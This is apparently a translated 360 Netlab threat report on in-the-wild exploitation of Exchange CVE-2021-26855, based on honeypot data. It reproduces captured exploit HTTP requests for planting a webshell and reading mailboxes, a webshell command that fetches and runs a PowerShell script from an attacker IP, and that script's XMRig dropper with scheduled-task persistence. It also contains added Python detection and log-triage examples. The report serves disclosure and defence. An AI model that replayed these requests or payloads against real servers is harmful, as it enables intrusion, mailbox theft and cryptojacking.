Microsoft Exchange Vulnerability (CVE-2021-26855): In-the-Wild Scan Analysis Report
source link: https://blog.netlab.360.com/microsoft-exchange-vulnerability-cve-2021-26855-scan-analysis/
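On March 2, 2021, Microsoft disclosed the remote code execution vulnerability in Microsoft Exchange servers [1].
Starting March 3, 2021, the 360 Netlab Anglerfish honeypot began simulating and deploying a Microsoft Exchange honeypot plugin, and we quickly collected a large amount of vulnerability-probing data. So far we have detected attackers planting webshells, retrieving mailbox information, and even running malicious XMRig mining (http://178.62.226.184/run.ps1). Based on a characteristic of the mining file's path name, we named this miner Tripleone.
Starting March 6, 2021, ProjectDiscovery and Microsoft's CSS-Exchange project successively published vulnerability detection scripts [2][3].
Exploiting the Microsoft Exchange remote code execution vulnerability involves complex steps, and it normally takes some time between the publication of a PoC and its use by underground-economy attackers. We see that this attack activity has already begun.
CVE-2021-26855: Planting a Webshell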
POST /ecp/j2r3.js HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/json; charset=utf-8
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=ResetOABVirtualDirectory&msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.&a=~1942062522; ASP.NET_SessionId=00782f75-8b35-11eb-af5a-560002fbb132; msExchEcpCanary=bTEwQdC2fkijeS-2wvtAdCnAngle7rfishIlH4dgINcqO6mYA4bY-ATaZjT2ZzjTIil62g3Tg23.
msExchLogonMailbox: S-1-5-20
Content-Length: 381
{"properties": {"Parameters": {"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel", "FilePathName": "\\\\127.0.0.1\\c$\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\test1337.aspx"}}, "identity": {"DisplayName": "OAB (Default Web Site)", "__type": "Identity:ECP", "RawIdentity": "7280d03f-194a-4bf3-98a7-076e7728321d"}}
CVE-2021-26855: Retrieving Mailbox Information
POST //ecp/ssrf.js HTTP/1.1
Host: {target}
Connection: close
Accept-Encoding: gzip
Accept: */*
User-Agent: Hello-World
Content-Type: text/xml
Cookie: X-BEResource=IBM-EX01/EWS/Exchange.asmx?a=~1942062522;
Content-Length: 756
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<m:GetFolder>
<m:FolderShape>
<t:BaseShape>Default</t:BaseShape>
</m:FolderShape>
<m:FolderIds>
<t:DistinguishedFolderId Id="inbox">
<t:Mailbox>
<t:EmailAddress>[email protected]</t:EmailAddress>
</t:Mailbox>
</t:DistinguishedFolderId>
</m:FolderIds>
</m:GetFolder>
</soap:Body>
</soap:Envelope>
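The two captures above share a shape a defender can match on: a request to a static-looking /ecp/ path that carries an X-BEResource cookie whose value embeds a backend URL path before the `~<digits>` suffix. The following Python check is an added example, not code from the original article; the regexes (including the list of static extensions) are a heuristic inferred from these two captures, and the sample requests, host names and backend names are constructed.

```python
import re

# Heuristic inferred from the two captures above (an assumption, not a vendor
# signature): X-BEResource is "<backend><URL path>...~<digits>".
BACKEND_PATH = re.compile(r"^(?P<backend>[^/]+)(?P<path>/[^~]*)~\d+$")
STATIC_ECP = re.compile(r"^/+ecp/[^/?]+\.(?:js|css|png|gif|ico)$", re.I)

# Constructed requests (headers only); host and backend names are placeholders.
SAMPLES = [
    "POST /ecp/x.js HTTP/1.1\r\nHost: mail.example.test\r\n"
    "Cookie: X-BEResource=BACKEND01/EWS/Exchange.asmx?a=~1942062522;\r\n\r\n",
    "POST //ecp/y.js HTTP/1.1\r\nHost: mail.example.test\r\nCookie: X-BEResource="
    "Administrator@BACKEND01:444/ecp/DDI/DDIService.svc/SetObject?a=~1942062522\r\n\r\n",
    "GET /owa/ HTTP/1.1\r\nHost: mail.example.test\r\n"
    "Cookie: X-BEResource=BACKEND01~1942062522; id=abc\r\n\r\n",
]


def parse_request(raw):
    """Split a raw HTTP request into (method, path, lower-cased headers)."""
    lines = raw.replace("\r\n", "\n").split("\n\n", 1)[0].split("\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def cookie_jar(header_value):
    """Parse Cookie by hand: the values here contain '/', '?' and '='."""
    jar = {}
    for part in header_value.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar


def inspect(raw):
    """Return a finding dict, or None when the request does not match."""
    method, path, headers = parse_request(raw)
    value = cookie_jar(headers.get("cookie", "")).get("X-BEResource", "")
    m = BACKEND_PATH.match(value)
    if not m:
        return None
    return {
        "method": method,
        "front_end_path": path,
        "static_looking": bool(STATIC_ECP.match(path)),
        "backend": m.group("backend"),
        "backend_path": m.group("path").split("?", 1)[0],
    }
```

Calling `inspect` on each entry of `SAMPLES` flags the first two requests and returns `None` for the third, whose cookie value has no embedded path.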
CVE-2021-26855: Mining Attack
POST /owa/auth/test1337.aspx HTTP/1.1
Host: {target}
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Content-Length: 211
Content-Type: application/x-www-form-urlencoded
code=Response.Write%28new+ActiveXObject%28%22WScript.Shell%22%29.exec%28%22powershell+IEX+%28New-Object+Net.WebClient%29.DownloadString%28http%3A%2F%2F178.62.226.184%2Frun.ps1%29%22%29.StdOut.ReadAll%28%29%29%3B
The attacker plants the XMRig mining program through the file http://178.62.226.184/run.ps1. The attack details are as follows:
$ProcessActive = Get-Process javacpl -ErrorAction SilentlyContinue
if($ProcessActive -eq $null)
{
new-item c:\temp\111 -itemtype directory
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile("http://178.62.226.184/config.json","C:\temp\111\config.json")
$WebClient.DownloadFile("http://178.62.226.184/javacpl.exe","C:\temp\111\javacpl.exe")
$WebClient.DownloadFile("http://178.62.226.184/WinRing0x64.sys","C:\temp\111\WinRing0x64.sys")
Start-Process -Filepath "C:\temp\111\javacpl.exe"
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-windowstyle hidden -executionpolicy bypass -noprofile IEX (New-Object Net.WebClient).DownloadString('http://178.62.226.184/run.ps1')"
$trigger = New-ScheduledTaskTrigger -Once -At (Get-Date) -RepetitionInterval (New-TimeSpan -Minutes 3)
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "App2" -Description "Check"
}
else
{
Write-host "run"
}
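Anglerfish Honeypot Data View
Starting March 6, 2021, the 360 Netlab Anglerfish honeypot system detected scanning for the Microsoft Exchange vulnerability (CVE-2021-26855). To date, the geographic distribution of the scanning source IP addresses is as follows:
Analysis of the scanned ports shows that the main destination port is 443 (77.3%), followed by port 80 (11.3%), as shown in the figure below:
According to the captured scan traffic, the ASNs (Autonomous System Numbers) of the scanning source IPs are mainly Linode, LLC, DiGiTALOCEAN-ASN and LeaseWeb Netherlands B.V., which together account for more than 50%. The overall scanning trend is as follows:
The scanning source IPs come from countries all over the world, with the United States accounting for the largest share, as shown in the figure below:
Analysis of the captured traffic shows that the top 5 scanning IPs account for 50% of all scanning activity, with 159.89.95.163 alone accounting for 24%, which indicates that this IP operates in a somewhat organized way.
Analysis of the attack traffic shows that attackers have already been able to exploit the vulnerability successfully to plant a webshell, as shown in the figure below:
Through the webshell, attackers carry out further malicious operations, such as planting the XMRig mining program, as shown in the figure below:
rDNS SLD Information for Some Scanning Source IPs
A simple analysis of the rDNS records of the source IPs scanning for the Microsoft Exchange vulnerability (CVE-2021-26855) reveals some organization information.
Webshell Analysis
We observed a large number of webshell path probing requests, most of which are scanning activity by security vendors and research institutions.
The known webshell paths are as follows: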
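The same kind of probing can be triaged in a server's own access logs by looking at requests for .aspx files under /aspnet_client/ and /owa/auth/, the two directories the probes in this article target. The following Python sketch is an added example, not code from the original article; the log format, the `BASELINE` allowlist, the scanner threshold and all sample lines are assumptions made for illustration.

```python
import re
from collections import Counter, defaultdict

# .aspx requests under the two directories probed in this article. BASELINE is
# a hypothetical allowlist of pages the operator has verified as shipped files.
CANDIDATE = re.compile(r"^/(?:aspnet_client|owa/auth)/.*\.aspx$", re.I)
BASELINE = {"/owa/auth/logon.aspx"}

# Constructed log, format "<src_ip> <method> <path> <status>"; the IPs are
# documentation addresses and the probed file names are made up.
LOG = """\
192.0.2.10 GET /aspnet_client/probe_a.aspx 404
192.0.2.10 GET /aspnet_client/probe_b.aspx 404
192.0.2.10 GET /owa/auth/probe_c.aspx 404
192.0.2.10 GET /owa/auth/Probe_C.aspx 404
198.51.100.7 GET /owa/auth/logon.aspx 200
198.51.100.7 GET /owa/ 302
203.0.113.5 GET //owa/auth/probe_d.aspx?x=1 200
203.0.113.5 POST /owa/auth/probe_d.aspx 200
""".splitlines()


def parse(line):
    """Return (src, method, normalised path, status) for one log line."""
    src, method, path, status = line.split()
    path = re.sub(r"/{2,}", "/", path.split("?", 1)[0]).lower()
    return src, method, path, int(status)


def triage(lines, scanner_threshold=3):
    """Count probes per source, list wide scanners and paths to review."""
    probes = Counter()            # candidate requests per source
    distinct = defaultdict(set)   # distinct candidate paths per source
    review = set()                # paths that answered 200 or received a POST
    for line in lines:
        src, method, path, status = parse(line)
        if not CANDIDATE.match(path) or path in BASELINE:
            continue
        probes[src] += 1
        distinct[src].add(path)
        if status == 200 or method == "POST":
            review.add(path)
    scanners = sorted(s for s, p in distinct.items() if len(p) >= scanner_threshold)
    return probes, scanners, sorted(review)


def top_share(probes, k):
    """Fraction of all probes sent by the k busiest sources."""
    total = sum(probes.values())
    return sum(n for _, n in probes.most_common(k)) / total if total else 0.0
```

`top_share` reproduces the kind of concentration figure quoted earlier for the top scanning IPs, and every path in the review list is a file to check on disk.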
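Microsoft Exchange Server Distribution
By mapping assets across the whole Internet, the 360 Quake cyberspace mapping system found 3,378,260 data records for Microsoft Exchange servers, covering 534,590 unique IPs. The distribution is shown in the figure below.
Interested readers can contact us on Twitter or by email at netlab[at]360.cn.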